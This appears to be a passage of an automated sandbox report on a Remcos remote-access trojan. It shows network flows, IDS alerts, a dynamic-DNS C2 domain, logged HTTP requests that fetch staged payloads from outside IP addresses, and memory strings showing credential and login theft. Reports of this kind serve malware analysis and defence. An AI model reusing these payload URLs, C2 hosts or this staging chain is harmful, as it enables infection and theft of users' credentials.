                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.239.241.184:80
                    Source: global trafficTCP traffic: 85.239.241.184:80 -> 192.168.2.22:49169

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 85.239.241.184:80 -> 192.168.2.22:49171
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 85.239.241.184:80 -> 192.168.2.22:49171
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 45.89.247.65:2201
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49170
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: dremom2.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: dremom2.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.89.247.65:2201
                    Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/RMHC.txt HTTP/1.1Host: 85.239.241.184Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 45.89.247.65 45.89.247.65
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                    Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49174 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /rXgoN HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: zeep.lyConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rXgoN HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: zeep.lyConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 85.239.241.184Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/fastgeecleancheckupnewthinkstobegetme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.239.241.184Connection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49170 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0041B411
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E4E4163-9857-4919-BB2D-E3650AD0FCC0}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /rXgoN HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: zeep.lyConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rXgoN HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: zeep.lyConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 85.239.241.184Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/fastgeecleancheckupnewthinkstobegetme.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.239.241.184Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /50/RMHC.txt HTTP/1.1Host: 85.239.241.184Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: bhv71A7.tmp.13.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhv71A7.tmp.13.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
